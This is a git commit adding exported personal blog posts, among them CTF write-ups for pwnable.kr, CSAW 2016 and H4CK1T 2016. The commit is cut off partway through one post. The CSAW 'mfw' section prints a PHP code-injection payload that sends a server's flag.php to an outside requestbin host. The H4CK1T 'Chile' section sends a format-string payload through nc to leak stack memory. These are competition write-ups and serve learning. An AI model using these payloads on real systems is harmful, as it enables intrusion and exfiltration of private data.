This commit is contained in:
parent
702ab0e9f6
commit
096a7a1280
17 changed files with 1279 additions and 0 deletions
31
src/content/posts/2014-12-28_How-to-accomplish-something.md
Normal file
31
src/content/posts/2014-12-28_How-to-accomplish-something.md
Normal file
|
@ -0,0 +1,31 @@
|
||||||
|
---
|
||||||
|
title: How to accomplish something.
|
||||||
|
date: 2014-12-28T06:18:06.940Z
|
||||||
|
tags: [medium-blog]
|
||||||
|
---
|
||||||
|
|
||||||
|
<article class="h-entry">
|
||||||
|
<section data-field="subtitle" class="p-summary">
|
||||||
|
It’s really simple.
|
||||||
|
</section>
|
||||||
|
<section data-field="body" class="e-content">
|
||||||
|
<section name="d840" class="section section--body section--first section--last">
|
||||||
|
<div class="section-content">
|
||||||
|
<div class="section-inner sectionLayout--insetColumn">
|
||||||
|
<p name="c074" id="c074" class="graf graf--p graf-after--h3">Don’t.</p>
|
||||||
|
<p name="8add" id="8add" class="graf graf--p graf-after--p">Give.</p>
|
||||||
|
<p name="2290" id="2290" class="graf graf--p graf-after--p">Up.</p>
|
||||||
|
<p name="6014" id="6014" class="graf graf--p graf-after--p graf--trailing">Simple.</p>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
</section>
|
||||||
|
<footer>
|
||||||
|
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
|
||||||
|
href="https://medium.com/p/f5c2ca623a76"><time class="dt-published"
|
||||||
|
datetime="2014-12-28T06:18:06.940Z">December 28, 2014</time></a>.</p>
|
||||||
|
<p><a href="https://medium.com/@failedxyz/how-to-accomplish-something-f5c2ca623a76"
|
||||||
|
class="p-canonical">Canonical link</a></p>
|
||||||
|
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
|
||||||
|
</footer>
|
||||||
|
</article>
|
74
src/content/posts/2015-03-19_A-Much-Needed-Apology.md
Normal file
74
src/content/posts/2015-03-19_A-Much-Needed-Apology.md
Normal file
|
@ -0,0 +1,74 @@
|
||||||
|
---
|
||||||
|
title: A Much-Needed Apology
|
||||||
|
date: 2015-03-19T23:34:26.674Z
|
||||||
|
tags: [medium-blog]
|
||||||
|
---
|
||||||
|
|
||||||
|
<article class="h-entry">
|
||||||
|
<section data-field="body" class="e-content">
|
||||||
|
<section name="276e" class="section section--body section--first section--last">
|
||||||
|
<div class="section-content">
|
||||||
|
<div class="section-inner sectionLayout--insetColumn">
|
||||||
|
<p name="cbee" id="cbee" class="graf graf--p graf-after--h3">If you’re participating in CTCTF this week, I
|
||||||
|
know it has been a hard week, and I have a huge apology to make, about several things.</p>
|
||||||
|
<p name="aa08" id="aa08" class="graf graf--p graf-after--p">I should not have helped out with this CTF. I
|
||||||
|
didn’t have much time to work on it, I was busy with school, and it really wasn’t a good time for me to be
|
||||||
|
doing it. However, I was really stupid so I decided to jump in anyway.</p>
|
||||||
|
<p name="def7" id="def7" class="graf graf--p graf-after--p"><strong
|
||||||
|
class="markup--strong markup--p-strong">If you’re in a rush, and you don’t care about all this stuff,
|
||||||
|
skip down to the bottom for the final hint.</strong></p>
|
||||||
|
<h4 name="dae6" id="dae6" class="graf graf--h4 graf-after--p">Backend</h4>
|
||||||
|
<p name="a52e" id="a52e" class="graf graf--p graf-after--h4">The website backend problems were completely my
|
||||||
|
fault. Things like the problems page saying your problem was unsolved when you actually received points
|
||||||
|
for it, or not being able to submit answers for problems because it said “You’ve already tried this.” Part
|
||||||
|
of this was not havingenough time to thoroughly test the server and catch all the problems.</p>
|
||||||
|
<h4 name="a9f0" id="a9f0" class="graf graf--h4 graf-after--p">IRC</h4>
|
||||||
|
<p name="6939" id="6939" class="graf graf--p graf-after--h4">This really isn’t my problem. But I’ll address
|
||||||
|
it anyway. The biggest problem was the choice of using Pdgn server. It works well for its purpose, and
|
||||||
|
does serve all its values. But it was too underdeveloped to use in an actual CTF, lacking features
|
||||||
|
including:</p>
|
||||||
|
<ul class="postList">
|
||||||
|
<li name="c5b2" id="c5b2" class="graf graf--li graf-after--p">Authentication — people just stole other
|
||||||
|
people’s usernames.</li>
|
||||||
|
<li name="379e" id="379e" class="graf graf--li graf-after--li">Operators — we lost all ops in the original
|
||||||
|
channel <em class="markup--em markup--li-em">and</em> the new channel.</li>
|
||||||
|
<li name="033c" id="033c" class="graf graf--li graf-after--li">Connection issues—we got lots of ECONNRESET
|
||||||
|
issues with KiwiIRC.</li>
|
||||||
|
</ul>
|
||||||
|
<h4 name="dd66" id="dd66" class="graf graf--h4 graf-after--li">Problems</h4>
|
||||||
|
<p name="1114" id="1114" class="graf graf--p graf-after--h4">I don’t know what to say about this. I urged
|
||||||
|
the other team members to shorten the duration of the competition to 3 days, but they wouldn’t budge, so
|
||||||
|
we ended up having a 7-day competition with only 20 easy problems. My friend said he solved all but 2 of
|
||||||
|
them in an hour.</p>
|
||||||
|
<p name="e3aa" id="e3aa" class="graf graf--p graf-after--p">We weren’t even going to use 1023megabytes
|
||||||
|
originally. But because of the immediate lack of problems, I figured we would need it.</p>
|
||||||
|
<p name="ebdb" id="ebdb" class="graf graf--p graf-after--p">When the competition started, there were only 18
|
||||||
|
questions up. I wrote “3 hard 3 me” in about 15 minutes during class. If you’re running a competition,
|
||||||
|
you’d want to keep your participants’ interests as long as possible; there’s no point if everyone quits
|
||||||
|
after a day — which is basically what happened.</p>
|
||||||
|
<p name="6d7d" id="6d7d" class="graf graf--p graf-after--p">I figured the purpose of creating such an
|
||||||
|
insanely BS problem was to keep people interested in the CTF, but also to keep the mods (who are on the
|
||||||
|
verge of quitting) motivated to keep going. I originally planned to give a lot of hints, and here is the
|
||||||
|
last one.</p>
|
||||||
|
<h4 name="110a" id="110a" class="graf graf--h4 graf-after--p">Hints</h4>
|
||||||
|
<p name="a74e" id="a74e" class="graf graf--p graf-after--h4">This is the final hint for “3 hard 3 me”: base
|
||||||
|
16, base 2, base 3.</p>
|
||||||
|
<p name="25ea" id="25ea" class="graf graf--p graf-after--p">For 1023megabytes, you probably already made
|
||||||
|
some connection between me and a group called the Donut Mafia. Try to find our fundraising website, and
|
||||||
|
the flag will be on a userpage.</p>
|
||||||
|
<p name="a67a" id="a67a" class="graf graf--p graf-after--p graf--trailing">I feel like I owe this to
|
||||||
|
everyone for a bad competition and hope you forgive me for all these mistakes. They won’t happen again. I
|
||||||
|
guess I’ll see you guys at the next CTF.</p>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
</section>
|
||||||
|
<footer>
|
||||||
|
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
|
||||||
|
href="https://medium.com/p/8f50537a8932"><time class="dt-published" datetime="2015-03-19T23:34:26.674Z">March
|
||||||
|
19, 2015</time></a>.</p>
|
||||||
|
<p><a href="https://medium.com/@failedxyz/a-much-needed-apology-8f50537a8932" class="p-canonical">Canonical
|
||||||
|
link</a></p>
|
||||||
|
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
|
||||||
|
</footer>
|
||||||
|
</article>
|
44
src/content/posts/2015-10-20_Pwnable-kr--fd--1.md
Normal file
44
src/content/posts/2015-10-20_Pwnable-kr--fd--1.md
Normal file
|
@ -0,0 +1,44 @@
|
||||||
|
---
|
||||||
|
title: "Pwnable.kr: fd (1)"
|
||||||
|
date: 2015-10-20T18:20:38.431Z
|
||||||
|
tags: [medium-blog]
|
||||||
|
---
|
||||||
|
|
||||||
|
<article class="h-entry">
|
||||||
|
<section data-field="body" class="e-content">
|
||||||
|
<section name="1d23" class="section section--body section--first section--last">
|
||||||
|
<div class="section-content">
|
||||||
|
<div class="section-inner sectionLayout--insetColumn">
|
||||||
|
<p name="ec7e" id="ec7e" class="graf graf--p graf-after--h3">This is my first writeup. The problem reads:
|
||||||
|
</p>
|
||||||
|
<blockquote name="b33e" id="b33e" class="graf graf--blockquote graf-after--p">Mommy! what is a file
|
||||||
|
descriptor in Linux?<br>ssh fd@pwnable.kr -p2222 (pw:guest)</blockquote>
|
||||||
|
<p name="0cc2" id="0cc2" class="graf graf--p graf-after--blockquote">Since it tells us to SSH to their
|
||||||
|
server, we’ll do that. Upon logging in, we find fd, an executable binary, fd.c, the source file, and flag,
|
||||||
|
the target file we are trying to read, but is currently protected by root. Let’s begin by analyzing fd.c.
|
||||||
|
</p>
|
||||||
|
<p name="3ba1" id="3ba1" class="graf graf--p graf-after--p">At the if statement, the program is checking buf
|
||||||
|
against the string LETMEWIN. Where is buf being read? It’s being read from a variable called fd, which is
|
||||||
|
a <a href="https://en.wikipedia.org/wiki/File_descriptor"
|
||||||
|
data-href="https://en.wikipedia.org/wiki/File_descriptor" class="markup--anchor markup--p-anchor"
|
||||||
|
rel="noopener" target="_blank"><strong class="markup--strong markup--p-strong">file
|
||||||
|
descriptor</strong></a>. Since the only way we can give input to the program is STDIN_FILENO, we have
|
||||||
|
to make sure fd is set to 0.</p>
|
||||||
|
<p name="a905" id="a905" class="graf graf--p graf-after--p">According to the code, fd is calculated by atoi(
|
||||||
|
argv[1] ) — 0x1234: it converts the user input into an integer and subtracts 0x1234, or 4660 in decimal.
|
||||||
|
To make fd equal to 0, we simply pass 4660 as an argument. This should cause the program to prompt us for
|
||||||
|
input. Now we just enter LETMEWIN, and it should print out the flag :)</p>
|
||||||
|
<blockquote name="8dca" id="8dca" class="graf graf--blockquote graf-after--p graf--trailing">mommy! I think
|
||||||
|
I know what a file descriptor is!!</blockquote>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
</section>
|
||||||
|
<footer>
|
||||||
|
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
|
||||||
|
href="https://medium.com/p/f9b66ed3a312"><time class="dt-published"
|
||||||
|
datetime="2015-10-20T18:20:38.431Z">October 20, 2015</time></a>.</p>
|
||||||
|
<p><a href="https://medium.com/@failedxyz/pwnable-kr-fd-1-f9b66ed3a312" class="p-canonical">Canonical link</a></p>
|
||||||
|
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
|
||||||
|
</footer>
|
||||||
|
</article>
|
34
src/content/posts/2016-09-07_So--I-started-a-blog.md
Normal file
34
src/content/posts/2016-09-07_So--I-started-a-blog.md
Normal file
|
@ -0,0 +1,34 @@
|
||||||
|
---
|
||||||
|
title: So. I started a blog.
|
||||||
|
date: 2016-09-07T20:18:04.000Z
|
||||||
|
tags: [medium-blog]
|
||||||
|
---
|
||||||
|
|
||||||
|
<article class="h-entry">
|
||||||
|
<section data-field="body" class="e-content">
|
||||||
|
<section name="3307" class="section section--body section--first section--last">
|
||||||
|
<div class="section-content">
|
||||||
|
<div class="section-inner sectionLayout--insetColumn">
|
||||||
|
<p name="d54d" id="d54d" class="graf graf--p graf-after--h3">Hi. I’m Michael, a college freshman at the
|
||||||
|
University of Minnesota. I love writing code, and I would frequently participate in capture-the-flag (CTF)
|
||||||
|
competitions! I might be posting more about those here.</p>
|
||||||
|
<p name="138d" id="138d" class="graf graf--p graf-after--p">I’ll use this space to rant about life. And post
|
||||||
|
CTF writeups too (maybe).</p>
|
||||||
|
<p name="2f45" id="2f45" class="graf graf--p graf-after--p graf--trailing">I’m really trying to change my
|
||||||
|
study/life habits now that I have more freedom. More specifically, going to sleep at 3:00am every day
|
||||||
|
isn’t going to work anymore. Recently I started waking up at 6:15am and I think getting things done in the
|
||||||
|
morning is even easier than getting things done at night for me. Only problem is the waking up part. I’ll
|
||||||
|
try it for a couple weeks and I’ll let you guys know how it goes.</p>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
</section>
|
||||||
|
<footer>
|
||||||
|
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
|
||||||
|
href="https://medium.com/p/f2d0db8a955d"><time class="dt-published"
|
||||||
|
datetime="2016-09-07T20:18:04.000Z">September 7, 2016</time></a>.</p>
|
||||||
|
<p><a href="https://medium.com/@failedxyz/so-i-started-a-blog-f2d0db8a955d" class="p-canonical">Canonical link</a>
|
||||||
|
</p>
|
||||||
|
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
|
||||||
|
</footer>
|
||||||
|
</article>
|
98
src/content/posts/2016-09-18_CSAW-CTF-2016-Quals.md
Normal file
98
src/content/posts/2016-09-18_CSAW-CTF-2016-Quals.md
Normal file
|
@ -0,0 +1,98 @@
|
||||||
|
---
|
||||||
|
title: CSAW CTF 2016 Quals
|
||||||
|
date: 2016-09-18T23:04:12.000Z
|
||||||
|
tags: [medium-blog]
|
||||||
|
---
|
||||||
|
|
||||||
|
<article class="h-entry">
|
||||||
|
<section data-field="body" class="e-content">
|
||||||
|
<section name="81bc" class="section section--body section--first section--last">
|
||||||
|
<div class="section-content">
|
||||||
|
<div class="section-inner sectionLayout--insetColumn">
|
||||||
|
<p name="3250" id="3250" class="graf graf--p graf-after--h3">Over the weekend, I worked with the team
|
||||||
|
Gophers in the Shell on CSAW CTF 2016. We ended up placing 317th place, with 401 points. Here I’m going to
|
||||||
|
document the problems that I solved during the competition.</p>
|
||||||
|
<h3 name="74cf" id="74cf" class="graf graf--h3 graf-after--p">Coinslot</h3>
|
||||||
|
<p name="7bae" id="7bae" class="graf graf--p graf-after--h3">For 25 points, the objective of this problem is
|
||||||
|
to output which coins/bills are needed for a given amount of money. When you connect to the server, it
|
||||||
|
will give you an amount in the form of $100.00 and then proceed to ask questions like $10,000 bills?. To
|
||||||
|
do this, I wrote a Python client to interact with the server.</p>
|
||||||
|
<pre name="7d34" id="7d34"
|
||||||
|
class="graf graf--pre graf-after--p">import socket<br>s = socket.socket()<br>s.connect((“misc.chal.csaw.io”, 8000))</pre>
|
||||||
|
<pre name="8c45" id="8c45"
|
||||||
|
class="graf graf--pre graf-after--pre">def recv(end=’\n’):<br> c, t = ‘’, ‘’<br> while c != end:<br> c = s.recv(1)<br> t += c<br> return t</pre>
|
||||||
|
<p name="79eb" id="79eb" class="graf graf--p graf-after--pre">This code will open a connection to the server
|
||||||
|
and read input until a certain character is reached. The algorithm for this problem is rather simple;
|
||||||
|
starting from the largest denomination ($10,000 bills), check if the remaining amount is greater than the
|
||||||
|
denomination (in other words, if that bill/coin can be used to pay the remaining amount), and then
|
||||||
|
subtract the largest multiple of that bill/coin from the remaining amount. In code, that looks like this:
|
||||||
|
</p>
|
||||||
|
<pre name="8793" id="8793"
|
||||||
|
class="graf graf--pre graf-after--p">r = recv()<br>amt = int(r.strip(“$”).strip().replace(“.”, “”))<br>print amt<br>for denom in denoms:<br> n = amt // denom<br> s.send(“%d\n” % n)<br> amt %= denom<br>recv()</pre>
|
||||||
|
<p name="2a5d" id="2a5d" class="graf graf--p graf-after--pre">Upon success, the server will then ask another
|
||||||
|
amount. I didn’t keep track of how many times it asked, but I wrapped the above code in a <code
|
||||||
|
class="markup--code markup--p-code">while True</code> loop and eventually I got the flag.</p>
|
||||||
|
<h3 name="bc76" id="bc76" class="graf graf--h3 graf-after--p">mfw</h3>
|
||||||
|
<p name="0e1b" id="0e1b" class="graf graf--p graf-after--h3">In this challenge we were presented with a site
|
||||||
|
with a navigation bar. On the About page, it tells you that the site was made with Git, PHP, and
|
||||||
|
Bootstrap. Upon seeing git, I immediately thought to check if the <code
|
||||||
|
class="markup--code markup--p-code">.git</code> folder was actually stored in the www root, and it was!
|
||||||
|
I ripped the git folder off the site and cloned it to restore the original folder structure.</p>
|
||||||
|
<p name="34a9" id="34a9" class="graf graf--p graf-after--p">There was a <code
|
||||||
|
class="markup--code markup--p-code">flag.php</code> in the templates folder, but the actual flag was
|
||||||
|
missing. That means I had to retrieve the flag from the actual server.</p>
|
||||||
|
<p name="c3f9" id="c3f9" class="graf graf--p graf-after--p">From the way the navigation bar was constructed,
|
||||||
|
it looks like I need to use local file inclusion. But I couldn’t use php’s <code
|
||||||
|
class="markup--code markup--p-code">base64</code> filter to print the contents of <code
|
||||||
|
class="markup--code markup--p-code">flag.php</code> because the <code
|
||||||
|
class="markup--code markup--p-code">$file</code> variable will stick ”templates/” to the front of the
|
||||||
|
given page before it’s <code class="markup--code markup--p-code">require_once</code>’d.</p>
|
||||||
|
<p name="c2bf" id="c2bf" class="graf graf--p graf-after--p">The trick to solving this one is injecting PHP
|
||||||
|
commands in the assert statements. I suspect that writing to the filesystem has been blocked. So instead,
|
||||||
|
I made a <a href="http://requestb.in" data-href="http://requestb.in"
|
||||||
|
class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">requestbin</a> that I would make
|
||||||
|
a GET request to, containing the contents of <code class="markup--code markup--p-code">flag.php</code>!
|
||||||
|
</p>
|
||||||
|
<p name="61df" id="61df" class="graf graf--p graf-after--p">The page I requested was:</p>
|
||||||
|
<pre name="8255" id="8255"
|
||||||
|
class="graf graf--pre graf-after--p">http://web.chal.csaw.io:8000/?page=flag%27+%2B+fopen%28%27http%3A%2F%2Frequestb.in%2F1l5k31z1%3Fp%3D%27+.+urlencode%28file_get_contents%28%27templates%2Fflag.php%27%29%29%2C+%27r%27%29+%2B+%27</pre>
|
||||||
|
<p name="80fb" id="80fb" class="graf graf--p graf-after--pre">Un-URL encoded, this looks like:</p>
|
||||||
|
<pre name="4d99" id="4d99"
|
||||||
|
class="graf graf--pre graf-after--p">flag’ + fopen(‘http://requestb.in/1l5k31z1?p=' . urlencode(file_get_contents(‘templates/flag.php’)), ‘r’) + ‘</pre>
|
||||||
|
<p name="e3c2" id="e3c2" class="graf graf--p graf-after--pre">As you can see, I’m reading the contents of
|
||||||
|
<code class="markup--code markup--p-code">flag.php</code>, URL-encoding it, and sending it to this
|
||||||
|
requestbin. This way, I can retrieve it from the requestbin later.
|
||||||
|
</p>
|
||||||
|
<h3 name="1a12" id="1a12" class="graf graf--h3 graf-after--p">Gametime</h3>
|
||||||
|
<p name="b5b0" id="b5b0" class="graf graf--p graf-after--h3">I got this close to the end of the competition,
|
||||||
|
but it suddenly hit me that if I just invert the condition of (if you hit the right key), then it will
|
||||||
|
think you win if you do absolutely nothing. Since they distributed the binary file instead of hosting it
|
||||||
|
on a server, this means I could just patch the binary file and re-run it.</p>
|
||||||
|
<p name="5875" id="5875" class="graf graf--p graf-after--p">I opened the exe in IDA, and used Alt+T to
|
||||||
|
search for <code class="markup--code markup--p-code">UDDER FAILURE</code>, the string it prints when you
|
||||||
|
fail. It actually occurs twice in the program, first during the “tutorial” level, and then during the
|
||||||
|
actual thing.</p>
|
||||||
|
<p name="3165" id="3165" class="graf graf--p graf-after--p">In both instances, right above where it prints
|
||||||
|
<code class="markup--code markup--p-code">UDDER FAILURE</code>, there is a <code
|
||||||
|
class="markup--code markup--p-code">jnz</code> that checks if the key you pressed was right. More
|
||||||
|
specifically, this occurs at <code class="markup--code markup--p-code">004014D5</code> and <code
|
||||||
|
class="markup--code markup--p-code">00401554</code>. To invert the condition, I had to change <code
|
||||||
|
class="markup--code markup--p-code">jnz</code> to <code class="markup--code markup--p-code">jz</code>.
|
||||||
|
In opcodes, that’s <code class="markup--code markup--p-code">75</code> and <code
|
||||||
|
class="markup--code markup--p-code">74</code>.
|
||||||
|
</p>
|
||||||
|
<p name="b409" id="b409" class="graf graf--p graf-after--p graf--trailing">Then I just ran the program
|
||||||
|
again, and waited for it to pass all the checks, and I got the flag!</p>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
</section>
|
||||||
|
<footer>
|
||||||
|
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
|
||||||
|
href="https://medium.com/p/f9c51dffa34"><time class="dt-published"
|
||||||
|
datetime="2016-09-18T23:04:12.000Z">September 18, 2016</time></a>.</p>
|
||||||
|
<p><a href="https://medium.com/@failedxyz/csaw-ctf-2016-quals-f9c51dffa34" class="p-canonical">Canonical link</a>
|
||||||
|
</p>
|
||||||
|
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
|
||||||
|
</footer>
|
||||||
|
</article>
|
186
src/content/posts/2016-10-02_H4CK1T-CTF-2016.md
Normal file
186
src/content/posts/2016-10-02_H4CK1T-CTF-2016.md
Normal file
|
@ -0,0 +1,186 @@
|
||||||
|
---
|
||||||
|
title: H4CK1T CTF 2016
|
||||||
|
date: 2016-10-02T20:46:42.000Z
|
||||||
|
tags: [medium-blog]
|
||||||
|
---
|
||||||
|
|
||||||
|
<article class="h-entry">
|
||||||
|
<section data-field="body" class="e-content">
|
||||||
|
<section name="efb5" class="section section--body section--first section--last">
|
||||||
|
<div class="section-content">
|
||||||
|
<div class="section-inner sectionLayout--insetColumn">
|
||||||
|
<p name="1568" id="1568" class="graf graf--p graf-after--h3">Over the past week, I again worked with Gophers
|
||||||
|
in the Shell on a Ukrainian CTF called H4CK1T CTF. We finished 59th out of 1057 teams, with 2703 points.
|
||||||
|
Here are some of my writeups.</p>
|
||||||
|
<h3 name="6a51" id="6a51" class="graf graf--h3 graf-after--p">Algeria (250)</h3>
|
||||||
|
<p name="dab1" id="dab1" class="graf graf--p graf-after--h3">In this task we are given an encrypted image as
|
||||||
|
well as the encryption script. The script looks like this (condensed):</p>
|
||||||
|
<pre name="7b4d" id="7b4d"
|
||||||
|
class="graf graf--pre graf-after--p">x = random.randint(1,255)<br>y = random.randint(1,255)</pre>
|
||||||
|
<pre name="4540" id="4540"
|
||||||
|
class="graf graf--pre graf-after--pre">img_pix.putpixel((0,0),(len(FLAG),x,y))</pre>
|
||||||
|
<pre name="636c" id="636c"
|
||||||
|
class="graf graf--pre graf-after--pre">for l in FLAG:<br> x1 = random.randint(1,255)<br> y1 = random.randint(1,255)<br> img_pix.putpixel((x,y),(ord(l),x1,y1))<br> x = x1<br> y = y1</pre>
|
||||||
|
<pre name="5375" id="5375" class="graf graf--pre graf-after--pre">img_pix.save(‘encrypted.png’)</pre>
|
||||||
|
<p name="f59f" id="f59f" class="graf graf--p graf-after--pre">It seems that each character of the flag is
|
||||||
|
placed at random points in the encrypted image. Fortunately, each character also comes with the
|
||||||
|
coordinates of the next character. To solve the challenge, we just write a reversing script.</p>
|
||||||
|
<pre name="61b5" id="61b5"
|
||||||
|
class="graf graf--pre graf-after--p">FLAG = “”<br>img = Image.open(“encrypted.png”)<br>img_pix = img.convert(“RGB”)</pre>
|
||||||
|
<pre name="bd59" id="bd59"
|
||||||
|
class="graf graf--pre graf-after--pre">FLAG_LEN, x, y = img_pix.getpixel((0, 0))<br>for i in range(FLAG_LEN — 1):<br> c, x, y = img_pix.getpixel((x, y))<br> FLAG += chr(c)</pre>
|
||||||
|
<pre name="cd1f" id="cd1f" class="graf graf--pre graf-after--pre">print FLAG</pre>
|
||||||
|
<p name="d169" id="d169" class="graf graf--p graf-after--pre">The flag is <code
|
||||||
|
class="markup--code markup--p-code">h4ck1t{1NF0RM$T10N_1$_N0T_$3CUR3_4NYM0R}</code>.</p>
|
||||||
|
<h3 name="e98b" id="e98b" class="graf graf--h3 graf-after--p">Argentina (100)</h3>
|
||||||
|
<p name="dbc4" id="dbc4" class="graf graf--p graf-after--h3">I’m guessing the point of this problem was for
|
||||||
|
you to go through the network data and look for the right packets, but I just used <code
|
||||||
|
class="markup--code markup--p-code">strings</code>.</p>
|
||||||
|
<pre name="4678" id="4678"
|
||||||
|
class="graf graf--pre graf-after--p">$ strings top_secret_39af3e3ce5a5d5bc915749267d92ba43.pcap | grep h4ck1t<br>PASS h4ck1t{i_G07_ur_f1l3s}</pre>
|
||||||
|
<p name="5407" id="5407" class="graf graf--p graf-after--pre">The flag is <code
|
||||||
|
class="markup--code markup--p-code">h4ck1t{i_G07_ur_f1l3s}</code>.</p>
|
||||||
|
<h3 name="d1f6" id="d1f6" class="graf graf--h3 graf-after--p">Brazil (100)</h3>
|
||||||
|
<p name="d93e" id="d93e" class="graf graf--p graf-after--h3">In this challenge, we get a ZIP full of random
|
||||||
|
files (that look super suspicious), and we are asked to look for a secret. One place I eventually decided
|
||||||
|
to look at was Thumbs.db, which is a file that stores thumbnails for Windows Explorer.</p>
|
||||||
|
<p name="ccd5" id="ccd5" class="graf graf--p graf-after--p">There are many tools out there that can help
|
||||||
|
open this type of file. I used <a href="https://thumbsviewer.github.io"
|
||||||
|
data-href="https://thumbsviewer.github.io" class="markup--anchor markup--p-anchor" rel="noopener"
|
||||||
|
target="_blank">Thumbs Viewer</a>. Either way, the flag is the name of one of the thumbnails, <code
|
||||||
|
class="markup--code markup--p-code">h4ck1t{75943a3ca2223076e997fe30e17597d4}</code>.</p>
|
||||||
|
<h3 name="7d4a" id="7d4a" class="graf graf--h3 graf-after--p">Canada (300)</h3>
|
||||||
|
<p name="4a27" id="4a27" class="graf graf--p graf-after--h3">I don’t think I did this the intended way, but
|
||||||
|
we were given a binary that apparently produces an output file. But I just did</p>
|
||||||
|
<pre name="62cc" id="62cc"
|
||||||
|
class="graf graf--pre graf-after--p">$ strings parse | grep h4ck1t<br> to unused region of span2910383045673370361328125_cgo_thread_start missingacquirep: invalid p stateallgadd: bad status Gidlebad procedure for programbad status in shrinkstackcan’t scan gchelper stackchansend: spurious wakeupcheckdead: no m for timercheckdead: no p for timerh4ck1t{T0mmy_g0t_h1s_Gun}mach_semcreate desc countmissing stack in newstackno buffer space availableno such file or directoryoperation now in progressreflect: Bits of nil Typereleasep: invalid p stateresource deadlock avoidedruntime: program exceeds runtime</pre>
|
||||||
|
<p name="500e" id="500e" class="graf graf--p graf-after--pre">The flag is <code
|
||||||
|
class="markup--code markup--p-code">h4ck1t{T0mmy_g0t_h1s_Gun}</code>.</p>
|
||||||
|
<h3 name="5532" id="5532" class="graf graf--h3 graf-after--p">China (150)</h3>
|
||||||
|
<p name="5d82" id="5d82" class="graf graf--p graf-after--h3">This one was rather annoying. When you first
|
||||||
|
open the RTF file, there is about 53 pages of random hex. I stripped all the nonsense off, and opened the
|
||||||
|
binary file with HxD, only to discover that it was a PNG. Not only that, it seemed to have a ZIP appended
|
||||||
|
to the end of it.</p>
|
||||||
|
<p name="d14c" id="d14c" class="graf graf--p graf-after--p">At that point, I just <code
|
||||||
|
class="markup--code markup--p-code">binwalk</code>’d the PNG and extracted the ZIP, leading me to <code
|
||||||
|
class="markup--code markup--p-code">flag.txt</code>, containing the flag, <code
|
||||||
|
class="markup--code markup--p-code">h4ck1t{rtf_d0cs_4r3_awesome}</code>.</p>
|
||||||
|
<h3 name="d060" id="d060" class="graf graf--h3 graf-after--p">Chile (100)</h3>
|
||||||
|
<p name="2e87" id="2e87" class="graf graf--p graf-after--h3">We’re told to connect to <code
|
||||||
|
class="markup--code markup--p-code">91.231.84.36:9001</code>. When we connect, we are greeted with a
|
||||||
|
prompt: <code class="markup--code markup--p-code">wanna see?</code></p>
|
||||||
|
<p name="bfaf" id="bfaf" class="graf graf--p graf-after--p">It seems that the program will print back
|
||||||
|
whatever you give it. One thought that came to mind was a print format vulnerability. If the program calls
|
||||||
|
<code class="markup--code markup--p-code">printf(input)</code> where <code
|
||||||
|
class="markup--code markup--p-code">input</code> is the user input, then putting format symbols into our
|
||||||
|
input will cause the program to start reading off the stack.
|
||||||
|
</p>
|
||||||
|
<p name="91c7" id="91c7" class="graf graf--p graf-after--p">There was probably a better way to do it, but
|
||||||
|
essentially I just grabbed the top 50 elements off the stack and looked for a flag. And it was there!</p>
|
||||||
|
<pre name="423e" id="423e"
|
||||||
|
class="graf graf--pre graf-after--p">failedxyz@backtick:~$ python -c ‘print “%p-” * 50’ | nc 91.231.84.36 9001<br>wanna see?<br>ok, so…<br>0x7f0778198483–0x7f07781999e0–0x7f0777ec4710–0x7f07781999e0-(nil)-0x70252d70252d7025–0x252d70252d70252d-0x2d70252d70252d70–0x70252d70252d7025–0x252d70252d70252d-0x2d70252d70252d70–0x70252d70252d7025–0x252d70252d70252d-0x2d70252d70252d70–0x70252d70252d7025–0x252d70252d70252d-0x2d70252d70252d70–0x70252d70252d7025–0x252d70252d70252d-0x2d70252d70252d70–0x70252d70252d7025–0x252d70252d70252d-0x2d70252d70252d70–0x2d70252d7025-(nil)-(nil)-0x7f0777de7c38-(nil)-0x7ffe058d71d0–0x7f0778198400–0x7f0777e54987–0x7f0778198400-(nil)-0x7f07783c7740–0x7f0777e517d9–0x7f0778198400–0x7f0777e49693-(nil)-0xea7c2294f9fed000–0x7ffe058d71d0–0x4007c1–0x647b74316b633468–0x355f7530595f4431–0x3f374168375f6545–0x7d373f-0x4007f0–0xea7c2294f9fed000–0x7ffe058d72b0-(nil)-(nil)-</pre>
|
||||||
|
<p name="92bf" id="92bf" class="graf graf--p graf-after--pre">If you get rid of the <code
|
||||||
|
class="markup--code markup--p-code">(nil)</code>s and reverse the string (remember endianness), then you
|
||||||
|
should eventually arrive at the flag, which is <code
|
||||||
|
class="markup--code markup--p-code">h4ck1t{d1D_Y0u_5Ee_7hA7??7}</code>.</p>
|
||||||
|
<h3 name="5a4b" id="5a4b" class="graf graf--h3 graf-after--p">Germany (200)</h3>
|
||||||
|
<p name="7699" id="7699" class="graf graf--p graf-after--h3">In this problem, we are given a dump of some
|
||||||
|
Corp User’s home folder. Most of the documents are useless, but what we are looking for is in the AppData
|
||||||
|
folder. More specifically, the transmission of information happens over Skype, so I looked in <code
|
||||||
|
class="markup--code markup--p-code">AppData\Roaming\Skype\live#3aames.aldrich</code>.</p>
|
||||||
|
<p name="e494" id="e494" class="graf graf--p graf-after--p"><code
|
||||||
|
class="markup--code markup--p-code">main.db</code> kinda stuck out, so I opened that first. It was an
|
||||||
|
SQLite database of a bunch of different Skype data. I ended up finding the flag in the <code
|
||||||
|
class="markup--code markup--p-code">Contacts</code> table, in the row containing the user <code
|
||||||
|
class="markup--code markup--p-code">zog black</code>, under <code
|
||||||
|
class="markup--code markup--p-code">province</code> and <code
|
